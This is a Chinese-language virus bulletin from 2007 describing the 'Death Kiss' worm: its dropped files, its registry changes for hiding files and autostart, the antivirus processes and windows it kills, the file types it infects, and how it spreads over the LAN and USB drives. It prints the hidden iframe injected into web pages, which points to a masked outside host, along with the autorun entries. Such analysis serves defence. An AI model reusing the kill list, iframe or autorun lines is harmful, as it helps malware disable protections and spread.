病毒别名： 处理时间：2007-03-15 威胁级别：★★

中文名称：死亡之吻 病毒类型：蠕虫 影响系统：Win 9x/ME,Win 2000/NT,Win XP,Win 2003

病毒行为:

这是一个类似熊猫烧香的感染型病毒,它能感染可执行文件与网页文件,

并能通过局域网与U盘传播.

1.在病毒所在目录下释放感染前原文件%病毒名%1L1~.exe

并往系统目录里面释放一个病毒体

%system%\\\\Supervise.exe (Worm.Death.ab.103936)

2.修改注册表

使"显示隐藏文件"不可选

HKLM\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Folder\\\\Hidden\\\\SHOWALL

"CheckedValue" = "0x00"

添加自启动项

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

"Supervise.exe" = "%system%\\\\Supervise.exe"

3.中止进程

病毒中止以下进程名的进程

EGHOST.EXE

MAILMON.exe

kavpfw.exe

iparmor.exe

_AVP32.EXE

_AVPCC.exe

_avpm.exe

avp.exe

navapw32.exe

navw32.exe

nod32kui.exe

nod32kru.exe

PFW.exe

Kfw.exe

KAVPFW.exe

vsmon.exe

Mcshield.exe

VstskMgr.exe

naPrdMgr.exe

UpdaterUI.exe

TBMon.exe

scan32.exe

Ravmond.exe

CCenter.exe

RavTask.exe

Rav.exe

Ravmon.exe

RavmonD.exe

RavStub.exe

RKVXP.kxp

KvmonXP.kxp

KVSrvXP.exe

KRegEx.exe

UIHost.exe

TrojDie.kxp

FrogAgent.exe

Logo1_.exe

Logo_1.exe

Rundll32.exe

runiep.exe

4.枚举窗口

病毒枚举桌面上的窗口,向窗口名为以下字符的窗口发送退出的消息

Symantec AntiVirus 企业版

江民杀毒软件 KV2006：实时监视

LockDownMain

ZoneAlarm

天网防火墙个人版

天网防火墙企业版

VirusScan

Symantec Antivirus

DubaWrapped gift Killer

IceSword

pjf(ustc)

噬菌体

木马克星

5.感染文件

病毒会感染以下扩展名文件:

EXE

SCR

COM

PIF

HTM

HTML

ASP

PHP

JSP

ASPX

其中可执行文件是叠加感染,而脚本文件则添加一个高度与宽度都为0的框架,

代码如下:

< iframe src=http://*****.com.cn/baidu.htm width=0 height=0>

6.局域网传播

病毒生成密码字典C:\\pass.dic

并使用该字典上面的密码尝试登录局域网内机器

若登录成功,则感染该机

7.感染移动硬盘

病毒会在移动存储器的分区里面生成autorun.ini

写入以下内容

[Autorun]

OPEN=Death.exe

shellexecute=Death.exe

shell\\Auto\\command=Death.exe